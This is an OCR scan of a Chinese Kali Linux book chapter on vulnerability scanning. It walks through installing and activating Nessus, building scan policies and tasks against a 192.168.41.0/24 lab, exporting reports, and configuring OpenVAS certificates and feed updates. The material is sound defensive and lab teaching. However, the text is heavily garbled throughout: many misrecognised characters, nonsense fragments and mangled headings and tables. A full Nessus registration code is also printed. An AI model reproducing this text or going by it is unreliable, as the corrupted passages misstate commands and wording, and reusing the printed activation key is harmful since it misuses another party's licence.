[ 
All plugins loaded 


- You can start nessusd by typing /etc/init.d/nessusd start 
- Then go to https://kali:8834/ to configure your scanner 


"TIR S 


BS 漏洞 扫描 


看 到 以 上 类 似 的 输出 信息 ， 表 示 Nessus 软件 包 安 装 成 功 。Nessus 默认 将 被 安装 在 
/opt/nessus 目录 中 。 

(6) 局 动 Nessus。 执 行 命令 如 下 所 示 : 

root@kali:~# /etc/init.d/nessusd start 

$Starting Nessus : . 

从 输出 的 信息 中 可 以 看 到 Nessus 服务 已 经 启动 。 


AE.: 使 用 Nessus 之 前 ， 必 须 有 一 个 注册 码 。 关 于 获取 激活 码 的 方法 在 第 2 章 已 经 介 
绍 过 ， 这 里 就 不 再 丙 述 。 


(7) 激活 Nessus。 执 行 命 令 如 下 所 示 : 
root@Kali:~# /opt/nessus/bin/nessus-fetch --register 9CC8-19A0-01A7-D4C1- 4521 


(8) X Nessus 创建 一 个 用 户 。 执 行 命令 如 下 所 示 : 


root@Kali:~# /opt/nessus/sbin/nessus-adduser 


(9) 登录 Nessus。 在 浏览 器 中 输入 地 址 https:// 主 机 IP:8834 或 https:// 主 机 名 :8834。 

通过 以 上 步骤 的 详细 介绍 , Nessus 不 配置 好 了 , DEAS LER] Nessus 扫 摘 各 种 的 漏 
洞 。 使 用 Nessus 扫描 漏洞 之 前 需要 新 建 扫描 策略 和 扫 摘 任务 ,为 了 后 面 能 顺利 的 扫 摘 各 种 
漏洞 ， 接 下 来 将 介绍 新 建筑 略 和 扫 摘 任务 的 方法 。 


1. 添加 策略 


添加 策略 的 具体 操作 步骤 如 下 所 示 。 
(1) 登录 Nessus. Nessus 是 一 个 安全 链接 ， 所 以 需要 添加 信任 后 才 允 许 登 录 。 在 浏览 
器 地 址 栏 中 输入 https://192.168.41.234:8834/， 将 显示 如 图 5.4 所 示 的 界面 。 


Untrusted Connection ~ Iceweasel 
File Edit View History Bookmarks Tools Help 
Æ Untrusted Connection (| 


@ | @ https:/192.168.41.234:3834 ve Je 


fa Most Visitedv flloffensive Security `Ñ Kali Linux ‘Ñ Kali Docs ERExploit-DB W Aircrack-ng 
n *- This Connection is Untrusted 


You have asked Iceweasel to connect securely to 192.168.41.234:8834, 
but we can't confirm that your connection is secure. 


Normally, when you try to connect securely, sites will present trusted 
identification to prove that you are going to the right place. However, this 
site's identity can't be verified. 


What Should | Do? 


If you usually connect to this site without problems, this error could mean 
that someone is trying to impersonate the site, and you shouldn't continue. 


Get me out of here! 


Technical Details 


! Understand the Risks 


图 5.4 连接 不 被 信任 
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(2 六 在 该 界面 单 击 IUnderstand the Risks 按钮 ， 将 显示 如 图 5.5 所 示 的 界面 。 


(3) i 
界面 。 


Untrusted Connection ~ Iceweasel 


File Edit View History Bookmarks Tools Help 


| 4. Untrusted A—— 


和 |@ https://192.168.41.234:8834 — č yE) [BI Google QL 


fi Most Visitedv [iJOffensive Security \ Kali Linux ™ Kali Docs ERExploit-DB BP Aircrack-ng 


continue. 


Technical Details 


If you understand what's going on, you can tell Iceweasel to start 
trusting this site's identification. Even if you trust the site, this error 
could mean that someone is tampering with your connection. 


Don't add an exception unless you know there's a good reason why this 
site doesn't use trusted identification. 


图 5.5 了 解 风险 
该 界面 显示 了 所 存在 的 风险 ， 单 击 Add Exception 按钮 ， 将 显示 如 图 5.6 所 示 的 
Add Security Exception 


You are about to override how |ceweasel identifies this site. 


Legitimate banks, stores, and other public sites will not 
ask you to do this. 


Server 
Location: https://192.168.41. 234:8834/ 
Certificate Status 
This site attempts to identify itself with invalid 
information. 一 
Wrong Site 


Certificate belongs to a different site, which could indicate an 
identity theft. 


Unknown Identity 


Certificate is not trusted, because it hasn't been verified by a 
recognized authority using a secure signature. 


Permanently store this exception 


Confirm Security Exception 


5.6 添加 安全 例外 


(4) 在 该 界面 单 击 Confirm Security Exception 按钮 ， 将 显示 如 图 5.7 所 示 的 界面 。 
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File Edit View History Bookmarks Tools Help 
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Ey Most Visited v [Offensive Security Ñ Kali Linux "& Kali Docs KlilExploit-DB W Aircrack-ng 


R Nessus 


home 


admin 


e 


Remember Me 


图 5.7 Nessus 登录 界面 


C5) 在 该 界面 输入 前 面 创 建 的 用 户 名 和 密码 ， 然 后 单 击 Sign In 按钮 ， 将 显示 如 网 5.8 
所 示 的 界面 。 


Nessus / Scans - Iceweasel uu" 


File Edit View History Bockmarks Tools Help 
5) Nessus / Scans | qP | 
<a > | @ https://127.0.0.1:8834/htmL5.html4#/scans v e El» Google 


Most Visitedv fllofftensive Security "Ñ Kali Linux "Kali Docs KlilExploit-DD $ Aircrack-ng 


(3 Nessus Scans Schedules Policies 


Scans 


My Scans 


No scans have been generaled for this acccunt. You can add a scan by clicking the "New Scan" 
tton. 


Trash 


b Al Scans 


New Folder 


图 5.8 Nessus 主 界面 


(6) 在 该 界面 使 用 鼠标 切换 到 Policies 选项 卡 上 ， 将 显示 如 图 5.9 所 示 的 界面 。 
CI) 在 该 界面 单 击 New Policy 按钮 ， 将 显示 如 图 5.10 所 示 的 界面 。 
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Nessus / Policies ~ Iceweasel - |O |x 
File Edt View History Bookmarks Tocls Help 
‘J Nessus / Policies [se 


@ | à hitps://127.0.0.1:8834/html5.html#/policies 


v G 图 ~ Google 


ft Most Visited v Be Offensive Security “& Kali Linux “A Kal Docs ERExploit-DB A Aircrack-ng 


(33 Nessus Scans Schedules Polizies Users admin v 
Policies | Upload 


o New Policy Policies / All Policies 


All Policies 
No policies have been created. You can add new policies by clicking the "Naw ?olicy" button. 


k ©1998 -2014 Tenable Ne work Securty® All Rights Reserved. Nessus Home Yerson: 5.2.4 . 


图 5.9 ”策略 界面 


Policy Wizards 
enumerates missing updates unknown web vulnerabilities Windows systems 
= 
Mobile Device Scan Prepare for PCI DSS Audits Offline Config Auditing 
Assess mobib devices via For administrators preparing for a Ipload and audit the config file of a 
Exchange or a Mobib Device PCI DSS compliance audit network device 
Advanced Policy 
.reate a policy without using any 
templates or recommendations 


Cancel 


图 5.10 策略 向 导 


(8) 该 界面 选择 创建 策略 类 型 。Nessus 默认 文 持 10 种 策略 类 型 ， 在 策略 类 型 上 有 绿 
色 条 的 表示 订阅 。 这 里 选择 Advanced Policy 类 型 ， 单 击 该 图 标 后 ， 将 显示 如 图 5.11 Aras 
的 界面 。 

(9) 在 该 界面 设置 策略 名 、 可 见 性 和 描述 信息 《可 选项 ) 。 这 里 设置 策略 名 为 Local 
VulnerabilityAssessment、 可 见 性 为 private. Aja i AC flf] Plugins 标签 , 将 显示 如 图 5.12 
所 示 的 界面 。 在 图 5.11 中 Visibility 有 两 个 选项 。 

Q private: (QA CREE V SR T 

C] shared: 其 他 用 户 也 能 使 用 该 策略 扫描 。 
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< Policies New Advanced Policy / General Settings / Basic 


General Settings 


Setting Type Basic v 
Credentials 
Plugins Name 
Local Vulnerability Assessment 
Preferences 
Visibility 
private X 
Description 


Allow Post-Scan Report Editing SA 


Cancel 


图 5.11 新 建 策略 


Policies | Disable All | Enable All | " is Y 
< Policies Local Vulnerability Assessment / Plugins Show Enabled | Show All 
General Settings Status Plugin Fami... Total : Status Plugin Name Plugin ID 
Credentials DISABLED AIX Local S... 11053 Default ... 48274 
"e Amazon Lin... 319 Default ... 12513 

Preferences 


Backdoors 97 Default ... 65820 
Brute force ... 26 Default ... 34081 
CentOS Loc... 1660 Default ... 40355 
CGI abuses 2904 Default ... 46240 
CGI abuses... 550 c Default ... 42368 


Canc el 


图 512 ”插件 程序 


(10) 该 界面 显示 了 所 有 插件 程序 ， 默 认 全 部 是 局 动 的 。 在 该 界面 可 以 单 击 Disable All 
按钮 ， 禁 用 所 有 启动 的 插件 程序 。 然 后 指定 需要 启动 的 插件 程序 ， 如 启动 Debian Local 
Security Checks 和 Default Unix Accounts 插件 程序 ， 局 动 后 如 图 5.13 所 示 。 

(11) 在 该 界面 单 击 Save 按钮 ， 将 显示 如 图 5.14 所 示 的 界面 。 

(12) 从 该 界面 可 以 看 到 新 建 的 策略 Local Vulnerability Assessment， 表 示 该 策略 已 创 
建成 功 。 
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Policies Disable All | Enable All | m 


Policies Local Vulnerability Assessment / Plugins Show Enabled | Show All 


A 


General Settings LEE CGI abuses... 550 Status Plugin Name Plugin ID | 


Credentials DISABLED CISCO 458 Default ... 48274 


Plugins DISABLED Databases 345 Default ... 12513 
Preferences Debian Loca... 2891 Default ... 65820 
Default Unix... 89 Default ... 34081 

DISABLED Denial of Se... 104 Default ... 40355 

DISABLED DNs 97 Default ... 46240 


DISABLED Fedora Loca... 6879 ENABLED Default ... 42368 


Save Cancel 


图 $.13 ”启动 的 插件 程序 


Nessus / Policies - Iceweasel 
File Edit View History Bookmarks Tools Help 
5 Nessus / Policies EJ 


€ @ https://127.0.0.1:8834/html5.html#/policies 


(23 Nessus 


Policies 


© New Policy Policies / All Policies 


All Policies Name ¥ Owner 


Local Vulnerability Assessment admin 


图 5.14 新 建 的 策略 


2. 新 建 扫描 任务 


策略 创建 成 功 后 ， 必 须要 新 建 扫 描 任务 才能 实现 漏洞 扫描 。 下 面 将 介绍 新 建 扫 描 任 务 
的 具体 操作 步骤 。 

C1) 在 图 5.14 中 ， 将 鼠标 切换 到 Scans 选项 卡 上 ， 将 显示 如 图 5.15 所 示 的 界面 。 

(2) 从 该 界面 可 以 看 到 当前 没有 任何 扫 拉 任务， 所 以 需要 添加 扫 摘 任务 后 才能 扫 摘 。 
在 该 界面 单 击 New Scan 按钮 ， 将 显示 如 图 5.16 所 示 。 

(3) 在 该 界面 设置 扫描 任务 名 称 、 使 用 策略 、 文 件 夹 和 扫 摘 的 目标 。 这 里 分 别 设置 为 
Sample Scan, Local Vulnerability Assessment ( pij [fl #r Œ HY HHA) . My Scans 和 
192.168.41.0/24。 然 后 单 击 Launch 按钮 ， 将 显示 如 图 5.17 所 示 的 界面 。 


. 124 。 


"$53 fid 


《4 六 从 该 界面 可 以 看 到 扫描 任务 的 状态 为 Running 〈 正 在 运行 ) ， 表 示 Sample Scan 
扫 持 任务 添加 成 功 。 如 果 想 要 停止 扫 摘 ， 可 以 单 击 (停止 一 下 )〉 按钮 。 如 果 和 暂停 扫 描 任 
45, Aih EH. 


Nessus / Scans ~- Iceweasel 


File Edit View History Bookmarks Tools Help 


Ə Nessus / Scans 
@ | à https://127.0.0.1:8834/htmL5.html4#/scans v @| [El Google Q 业 


Most Visited v BP Offensive Security \ Kali Linux `Ñ Kali Docs EBExploit-DB M Aircrack-ng 


(33 Nessus Scans Schedules Policies Users admin v 


Scans 


My Scans 
No scans have been generated for this account. You can add a scan by clicking the "New Scan" button. 
Trash 


> All Scans 


New Folder 


图 5.15 扫描 任务 界面 


《 Scans New Scan / Basic Settings 


Basic Settings Sample Scan 


Schedule Settings 
Local Vulnerability Assessment 


Email Settings 


My Scans 


192.168.41.0/24 


Upload Targets Add File 


Launch Cancel 


图 5.16 新 建 扫描 任务 
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Nessus / Scans - Iceweasel -|o - 
File Edit View History Bookmarks Tools Help 
Nessus / Scans EJ 
@ | à https://127.0.0.1:8834/html5.html#/scans ve Lb 
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, c 
(33 Nessus Scans 1 | Schedules Policies Users admin a 
Scans Upload 
My Scans ED Name Status 
Trash Sample Scan C) Running 

> All Scans 
New Folder 
Lv) 


图 5.17 运行 扫描 任务 


5.1.2 扫描 本 地 漏洞 


在 前 面 介 绍 了 Nessus 的 安装 、 配 置 、 登 录 及 新 建筑 略 和 扫描 任务 ， 现 在 可 以 开始 第 一 
次 测试 组 的 安全 漏洞 。 对 于 新 建筑 略 和 扫描 任务 这 里 就 不 再 交 述 ， 本 小 节 中 只 列 出 扫 摘 本 
地 漏洞 所 需 添加 的 插件 程序 及 分 析 扫 描 信 息 。 

【实例 S-1】 扫 摘 本 地 漏洞 具体 操作 步骤 如 下 所 示 。 

(1) 新 建 名 为 Local Vulnerability Assessment 策略 。 

(2) 添加 所 需 的 插件 程序 。 

O Ubuntu Local Security Checks: 扫描 本 地 Ubuntu 安全 检查 。 

Q Default Unix Accounts: 扫 摘 默认 Unix 账户 。 

(3) 新 建 名 为 Sample Scan 扫 摘 任务 。 

(4) 扫 拉 漏洞。 扫描 任 务 执行 完成 后 ， 将 显示 如 图 5.18 所 示 的 界面 。 


5 Nessus / Scans | ap | 
<a @ https://127.0.0.1:8834/htmL5.html4#/scans v @| | 图 ~ Google Q iL 


ExMost Visitedv [iJOffensive Security Ñ Kali Linux "& Kali Docs ERExploit-DB W Aircrack-ng 


p 
(23 Nessus Scans Schedules Policies sers admin - 


Scans 


My Scans Name Last Updated 4 Status 


Trash Sample Scan April 24, 2014 15:08:09 v Completed 


> All Scans 


New Folder 


图 5.18 扫描 完成 
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(5 六 在 该 界面 双击 扫描 任务 名 称 Sample Scan， 将 显示 扫描 的 详细 信息 ， 如 图 5.19 
Br. 


Sample Scan Export v Audit Trail v 
Scans » Hosts Vulnerabilities Hide Details 
Host Vulnerabilities 4 Scan Details 


192.168.41.1 Name: Sample Scan 


= 
Folder: My Scans 
192.168.41.234 | ^2 NEM Status: ^ Completed 
Policy: Local Vulnerability Assessment 
ia 272 2 2 2 Targets: — 192.168.41.0/24 
Start time: Thu Apr 24 15:03:49 2014 
End time: Thu Apr 24 15:08:09 2014 
Elapsed: — 4 minutes 


192.168.41.235 


Vulnerabilities 


图 5.19 扫描 的 详细 信息 


C60 从 该 界面 可 以 看 到 总 共 扫 描 了 三 台 主 机 。 扫 描 主 机 的 漏 铜 情况 ， 可 以 查看 
Vulnerability 列 ， 该 列 中 的 数字 表示 扫描 到 的 信息 数 。 右 侧 显 示 了 扫 擂 的 详细 信息 ， 如 扫 
描 任务 名 称 、 状 态 、 人 策略 、 目 标 主 机 和 时 间 等 。 右 下 角 以 圆 形 图 显示 了 漏洞 的 危险 情况 ， 
分 别 使 用 不 同 颜色 显示 漏洞 的 严重 性 。 本 机 几乎 没 任何 漏洞 ， 所 以 显示 是 监 色 (Info) 。 
关于 漏洞 的 信息 使 用 在 该 界面 可 以 单 击 Host 列 中 的 任何 一 个 地 址 ， 显 示 该 主机 的 详细 信 
AN, 包括 IP 地 址 、 操 作 系统 关 型 、 扫 描 的 起 始 时 间 和 结束 时 间 等 .本 例 中 选择 192.168.41.234 
地 址 ， 如 图 5.20 Prax. 


P, 
{5 Nessus Scans Schedules Jsers admin 
Sample Scan Expot v Audit Trail | 。 
Hosts > 192.168.41.234 > Vulnerabilities El Hide Details 
Severity = Plugin Name Count A Host Details 
netstat portscanner (SSH) 4 IP: 192.168.41.234 
OS: Linux Kernel 3.12-kalit -686-pae 


Start time: Thu Apr 24 15:04:43 2014 
End time: Thu Apr 24 15:04:57 2014 
KB: Download 


YV Vulnerabilities c 


图 5.20 漏洞 信息 


oat YY a 
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(7 六 在 该 界面 单 击 INFO 按钮 ， 将 显示 具体 的 漏洞 信息 ， 如 图 5.21 所 示 。 


al 
netstat portscanner (SSH) ^ Plugin Details 
Severity: Info 
Description 
ID: 14272 
This plugin runs 'netstat' on the remote machine to enumerate open ports. Version: 1.57 
Type: remote 
See the section ‘plugins options’ to configure it. i 
Family: Port scanners 
Published: 2004/08/15 
Output Modified: 2013/10/30 
Port 68/udp was found to be open 
^. Risk Information 
Port ¥ Hosts 
Risk Factor. None 
68 / udp 192.168.41.234 |^ 
Port 8834/tcp was found to be open 
Port ¥ Hosts 
8834 / tcp / www 192.168.41.234 Ø 
Port 15774/udp was found to be open 
v) 


图 5.21 漏洞 详细 信息 


(8) 该 界面 显示 了 漏洞 的 描述 信息 及 扫描 到 的 信息 。 例 如 ， 该 主机 上 开局 了 68. 8834 
和 15774 等 端口 。 使 用 Nessus 还 可 以 通过 导出 文件 的 方式 得 看 漏洞 信息 ， 导 出 的 文件 格式 
包括 Nessus, PDF, HTML, CSV 和 Nessus DB。 导 出 文件 的 方式 如 下 所 示 : 

在 图 5.20 中 单 击 Export 按钮 ， 选 择 导出 文件 的 格式 。 这 里 选择 PDF 格式 ， 单 击 PDF 
命令 ， 将 显示 如 图 5.22 所 示 的 界面 。 


PDF Chapter Selection 


Available Content Report Content 


eee remus Drag and organize content here. 


Vulnerabilities By Host 


Vulnerabilities By Plugin 


图 5.22 可 用 的 内 容 


(9) 该 界面 分 为 两 部 分 ， 包 括 Available Content〈 可 用 的 内 容 ) 和 Report Content (GR 
HAA) 。 该 界面 显示 了 导出 的 PDF 文件 中 可 包括 的 内 容 有 主机 摘要 信息 、 主 机 漏洞 和 插 
fFüsd]. FER 5.22 中 将 要 导出 的 内 容 用 鼠标 拖 到 Report Content 框 中 ， 拖 入 内 容 后 将 显示 


S15 


"hsc dedi 


如 图 5:23 所 示 的 界面 。 


PDF Chapter Selection 


Available Content Report Content 


Vulnerabilities By Host Hosts Summary (Executive) 


Vulnerabilities By Plugin 


图 $.23 ”导出 的 内 容 


(10) 在 该 界面 显示 了 将 要 导出 的 内 容 。 此 时 单 击 Export 控 钮 ， 将 显示 如 图 5.24 所 示 
的 界面 。 
Opening Sample-Scan-pme3e2.pdf 
You have chosen to open: 


图 Sample_Scan_pme3e2.pdf 


which is a: PDF 文档 (23.6 KB) 
from: https://127.0.0.1:8834 


Would you like to save this file? 


图 5.24 下 载 界 面 
(11) 在 该 界面 单 击 Save File 按钮 ， 指 定 该 文件 的 保存 位 置 ， 即 PDF 文件 导出 成 功 。 


5.1.3 $2 Dod 2 7 2] 


如 果 用 户 想 要 使 用 Nessus 攻击 一 个 大 范围 的 漏洞 , 需要 配置 评估 漏洞 列表 并 指定 获取 
信息 的 评估 列表 。 本 小 节 将 介绍 配置 Nessus 在 目标 主机 寻找 网 络 漏洞 ， 这 些 漏洞 指 目标 主 
机 或 其 他 网 络 协议 。 

【实例 S-2】 扫描 网 络 漏洞 的 具体 操作 步骤 如 下 所 示 。 

(1) 新 建 名 为 Internal Network Scan 策略 。 

(2) 添加 所 需 的 插件 程序 ， 如 表 5-1 所 示 。 


表 5-1 所 需 插件 程序 


CISCO 扫描 CISCO 系统 

DNS 扫描 DNS HRA at 

Default Unix Accounts TA ASHER AA PP A 3 
FTP 扫描 FTP 服务 器 

Firewalls 扫描 代理 防火 墙 

Gain a shell remotely 扫描 远程 获取 的 Shell 

Geeral 扫描 常用 的 服务 


a o a 
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Netware 扫描 网 络 操作 系统 
Peer-To-Peer File Sharing 扫 拉 共享 文 件 检 测 

Policy Compliance 扫描 PCI DSS 和 SCAP 信息 
SCADA FAT BC FATA 

SMTP Problems 扫描 SMTP 问题 

SNMP 扫描 SNMP 相关 信息 
Service Detection 扫描 服务 侦察 

Settings 扫描 基本 设置 


(3) 新 建 名 为 Network Scan 扫描 任务 。 
(4) 扫描 结果 如 图 5.25 Ara. 


Network Scan Expat v Audit Trail v 
Hosts > 192.168.41.1 > Vulnerabilities Hide Details 
Severity a Plugin Name Count A Host Details 
SSL Certificate Cannot Be Trusted 1 IP: 192.168.41.1 
DNS: localhost 
SSL Self-Signed Certificate 1 MAC: 00:50:56:c0:00:08 
OS: Microsoft Windows 7 Ultimate 
Nessus SYN scanner 7 Start time: Fri Apr 25 13:37:33 2014 


Endtime: Fri Apr 25 13:39:16 2014 


Service Detection 7 KB: Download 
VMware ESX/GSX Server detection 2 
Common Platform Enumeration (CPE) 1 

图 5.25 ”网络 扫描 结果 


(5) 从 该 界面 可 以 看 到 有 两 个 比较 严重 的 漏洞 。 如 果 想 要 详细 地 分 析 该 漏洞 ， 建 议 将 
该 信息 使 用 文件 的 形式 导出 。 


YY Vulnerabilities 


5.1.4 扫描 指定 Linux 的 系统 漏洞 


本 小 亨 将 介绍 使 用 Nessus 扫 摘 指定 Linux 系统 上 的 漏洞 。 

【实例 S-3】 扫描 指定 Linux 系统 漏洞 的 具体 操作 步骤 如 下 所 示 。 

(1) 使 用 Metasploitable 2.0 作为 日 标 主 机 。 用 户 也 可 以 使 用 其 他 版 本 的 Linux 系统 。 
(2) 新 建 名 为 Linux Vulnerability Scan 策略 。 

(3) 添加 所 需 的 插件 程序 ， 如 表 5-2 所 示 。 


表 5-2 所 需 插件 程序 


Backdoors 扫描 秘 密 信 息 

Brute Force Attacks 暴力 攻击 

CentOSo Local Security Checks 扫描 CentOS 系统 的 本 地 安全 漏洞 
DNS 扫描 DNS 服务 器 


° 130° 


Debian Local Security Checks 
Default Unix Accounts 

Denial of Service 

FTP 

Fedora Local Security Checks 
Firewalls 

FreeBSD Local Security Checks 
Gain a shell remotely 

General 

Gentoo Local Security Checks 
HP-UX Local Security Checks 
Mandriva Local Security Checks 
Misc 

Red Hat Local Security Checks 
SMTP Porblems 

SNMP 


Scientific Linux Local Security Checks 


Slackware Local Security Checks 
Solaris Local Security Checks 
SuSE Local Security Checks 
Ubuntu Local Security Checks 
Web Servers 


漏洞 扫描 


扫 摘 Debian 系统 的 本 地 安全 漏洞 
扫描 默认 Unix 用 户 账号 

扫描 拒绝 的 服务 

扫描 FTP 服务 器 

扫描 Fedora 系统 的 本 地 安全 漏洞 
扫描 防火 墙 

扫描 FreeBSD 系统 的 本 地 安全 漏洞 
扫描 远程 获得 的 Shell 

扫描 漏洞 

扫描 Gentoo 系统 的 本 地 安全 漏洞 
扫描 HP-UX 系统 的 本 地 安全 漏洞 
扫描 Mandriva 系统 的 本 地 安全 漏洞 
扫描 复杂 的 漏洞 

扫描 Red Hat 系统 的 本 地 安全 漏洞 
扫描 SMTP 问题 

扫描 SNMP 漏洞 

扫描 Scientific Linux 系统 的 本 地 安全 漏洞 
扫描 Slackware 系统 的 本 地 安全 漏洞 
扫描 Solaris 系统 的 本 地 安全 漏洞 
扫描 SuSE 系统 的 本 地 安全 漏洞 
扫描 Ubuntu 系统 的 本 地 安全 漏洞 
扫描 Web 服务 器 


(4) 新 建 名 为 Linux Vulnerability Scan 扫描 任务 。 
(5) 扫描 漏洞 ， 扫 摘 结 果 如 图 5.26 所 示 。 


Linux Vulnera... 


Scans » Hosts 


Host 


192.168.41.254 


192.168.41.2 


192.168.41.235 


192.168.41.234 


192.168.41.1 


192.168.41.142 


Vulnerabilities 


Vulnerabilities v 


Remediations 


Expot v Audit Trail 


Hide Details 


Scan Details 


Name: 
Folder: 


Linux Vulnerability Scan 
My Scans 
Completed 
Linux Vulnerability Scan 


Status: 


Policy: 


192.168.41.0/24 
Fri Apr 25 14:06:39 2014 


Targets: 
Start time: 


End time: 
Elapsed: 


Fri Apr 25 14:13:09 2014 


7 minutes 


Vulnerabilities 


^N 


图 5.26 指定 Linux 系统 扫描 结果 
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(6 从 该 界面 可 以 看 到 总 共 扫 描 了 6 台 主 机 上 的 漏洞 信息 。 其 中 ,主机 192.168.41.142 
卡 存 在 7 个 比较 严重 的 漏洞 。 关 于 汤 洞 的 百分比 情况 ， 可 以 从 右 下 角 的 局 形 图 中 了 解 到 。 
同样 ， 用 户 可 以 使 用 前 面 介绍 过 的 两 种 方法 ， 查 看 漏洞 的 详细 信息 。 


5.1.5 扫描 指 定 Windows 的 系统 漏洞 


本 节 将 介绍 使 用 Nessus 扫描 指定 Windows 系统 上 的 漏洞 。 

【实例 5-4] 使 用 Nessus 扫描 指定 Windows 系统 漏洞 。 本 例 中 使 用 Windows 7 系统 作 
为 目标 主机 。 有 具体 扫 摘 步骤 如 下 所 示 。 

(1) 新 建 名 为 Windows Vulnerability Scan 策略 。 

(2) 添加 所 需 的 插件 程序 ， 如 表 5-3 所 示 。 


表 5-3 所 需 插件 程序 


DNS 扫描 DNS 服务 器 
Databases 扫描 数据 库 

Denial of Service 扫描 把 绝 的 服务 

FTP 144i FTP 服务 器 

SMTP Problems 扫描 SMTP 问题 

SNMP Hi SNMP 

Settings 扫描 设置 信息 

Web Servers 扫描 Web Servers 
Windows 扫描 Windows 
Windows:Microsoft Bulletins 扫描 Windows 中 微软 公告 
Windows:User management 扫描 Windows 用 户 管理 


(3) 开始 扫 摘 漏洞 。 扫 摘 结果 如 图 5.27 所 示 。 


Nessus / Scans / Hosts - Iceweasel 


File Edit View History Bookmarks Tools Help 


D Nessus / Scans / Hosts | oe | 


@ | à nttps//127.0.0.1:8834/htmL5.htmltt/scans/56092639-fb1d-9cf5-a07 17 v @| | 图 v Google 


Ex Most Visitedv [Offensive Security "Ñ Kali Linux "Kali Docs KllExploit-DB W Aircrack-ng 
Windows Vul... Export + Audit Trail 


Scans » Hosts 而 Vulnerabilities Hide Details 


Host Vulnerabilities v Scan Details 


192.168.41.1 Name: Windows Vulnerability Scan 


Folder: My Scans 

Status: Completed 

Policy: Windows Vulnerability Scan 
Targets: 192.168.41.1 

Start time: Fri Apr 25 14:09:15 2014 
End time: Fri Apr 25 14:10:52 2014 
Elapsed: 2 minutes 


图 5.27 扫描 Windows 系统 的 结果 
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(4 六 从 该 界面 可 以 看 到 主机 192.168.41.1 的 漏洞 情况 ， 该 主机 中 存在 一 个 比较 严重 的 
漏洞 。 同 样 用 户 可 以 使 用 表面 介绍 过 的 两 种 方法 得 看 漏洞 的 详细 信息 ， 进 而 修改 主机 中 存 
在 的 漏洞 。 


5.2 使 用 OpenVAS 


OpenVAS (开放 式 漏洞 评估 系统 ) 是 一 个 客户 端 /服务 器 架构 ， 它 利用 来 评估 目标 主机 
上 的 漏洞 。OpenVAS 是 Nessus 项 目的 一 个 分 文 ， 它 提供 的 产品 是 完全 地 免费 。OpenVAS 
默认 安装 在 标准 的 Kali Linux 上 ， 本 市 将 介绍 配置 及 局 动 OpenVAS. 


5.2.1 fit OpenVAS 


OpenVAS 默认 在 Kali Linux 中 已 经 安装 。 如 果 要 使 用 该 工具 ， 还 需要 进行 一 些 配置 。 
配置 OpenVAS 具体 操作 步骤 如 下 所 示 。 

(1) 在 终端 窗口 中 切换 到 OpenVAS Axx, A OpenVAS 程序 创建 SSL 证 书 。 执 行 命 
令 如 下 所 示 : 


root@kali:~# cd /usr/share/openvas/ 
root@kali:/usr/share/openvas# openvas-mkcert 


执行 以 上 命令 后 ， 将 输出 如 下 所 示 的 信息 : 


Creation of the OpenVAS SSL Certificate 


This script will now ask you the relevant information to create the SSL certificate of OpenVAS. 
Note that this information will «NOT* be sent to anybody (everything stays local), but anyone with 


the ability to connect to your OpenVAS daemon will be able to retrieve this information. 


CA certificate life time in days [1460]: # 设 置 CA 证 书 有 效 时 间 
Server certificate life time in days [365]: # 设 置 服务 证 书 有 效 时 间 
Your country (two letter code) [DE]: # 设 置 国家 

Your state or province name [none]: # 设 置 州 或 省 份 

Your location (e.g. town) [Berlin]: # 设 置 城市 

Your organization [OpenVAS Users United]: # 设 置 组 织 


以 上 提示 的 信息 ， 可 以 配置 也 可 以 不 配置 。 如 果 不 想 配 置 的 话 ， 直 接 按 下 Enter 键 接 
收 稚 认 值 即 可 。 以 上 信息 设置 完 后 ， 将 显示 以 下 信息 : 


Congratulations. Your server certificate was properly created. 
The following files were created: 
. Certification authority: 
Certificate = /var/lib/openvas/CA/cacert.pem 
Private key = /var/lib/openvas/private/CA/cakey.pem 
. OpenVAS Server : 
Certificate = /var/lib/openvas/CA/servercert.pem 
Private key = /var/lib/openvas/private/CA/serverkey.pem 


EC LE 
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Press [ENTER] to exit 


输出 的 信息 显示 了 创建 的 OpenVAS 证 书 及 位 置 。 此 时 按 下 Enter 键 ， 退 出 程序 。 
(2) 使 用 OpenVAS NVT Feed 同步 OpenVAS NVT 数据 库 , 并 且 更 新 最 新 的 漏洞 检查 。 
执行 命令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvas-nvt-sync 

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed’. 

[i] The 'OpenVAS NVT Feed is provided by 'The OpenVAS Project’. 

[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed.html'. 

[i] NVT dir: /var/lib/openvas/plugins 

[i] rsync is not recommended for the initial sync. Falling back on http. 

[i] Will use wget 

[i] Using GNU wget: /usr/bin/wget 

[i] Configured NVT http feed: http://www.openvas.org/openvas-nvt-feed-current.tar.bz2 

[i] Downloading to: /tmp/openvas-nvt-sync.xAKyyzY VdT/openvas-feed-2014-04-25-8214.tar.bz2 
--2014-04-25 14:35:48--  http://www.openvas.org/openvas-nvt-feed- 

current.tar.bz2 

正在 解析 主机 www.openvas.org (www.openvas.org)... 5.9.98.186 

正在 连接 www.openvas.org (www.openvas.org)|5.9.98.186|:80... 已 连接 。 

已 发 出 HTTP 请 求 ， 正 在 等 待 回应 … 200 OK 

长 度 : 14771061 (14M) [application/x-bzip2] 

正在 保存 至 : “/tmp/openvas-nvt-sync.xAKyyzY VdT/openvas-feed-2014-04-25-8214.tar.bz2” 


14,771,061 54.0K/s 用 时 7m 16s 
2014-04-25 14:43:07 (33.1 KB/s)- 已 保存 “/tmp/openvas-nvt-sync.xAKyyzYVdT/openvas- feed- 
2014-04-25-8214.tar.bz2” [14771061/14771061]) 


12planet chat server xss.nasl 

12planet chat server xss.nasl.asc 
2013/ 

2013/secpod ms13-005.nasl.asc 
2013/gb astium voip pbx 51273.nasl 
2013/secpod ms13-001.nasl 
2013/deb 2597 .nasl 

2013/gb astium voip pbx 51273.nasl.asc 
2013/secpod ms13-006.nasl 

2013/gb edirectory 5/038.nasl 
2013/secpod ms13-006.nasl.asc 

… 省 略 部 分 内 容 .… 
zope_zclass.nasl.asc 
zyxel http pwd.nasl 

zyxel http pwd.nasl.asc 

zyxel pwd.nasl 

zyxel pwd.nasl.asc 

[i] Download complete 

[i] Checking dir: ok 

[i] Checking MD5 checksum: ok 


输出 的 信息 显示 了 同步 OpenVAS NVT 数据 库 的 信息 ， 并 也 更 新 了 所 有 的 漏洞 信息 。 
(3) 创建 客户 端 证 书库 。 执 行 命令 如 下 所 示 : 
root@kali:/usr/share/openvas# openvas-mkcert-client -n om -i 


Generating RSA private key, 1024 bit long modulus 
十 十 十 十 十 十 


... M 由 看 十 十 十 十 

e is 65537 (0x10001) 

You are about to be asked to enter information that will be incorporated 

into your certificate request. 

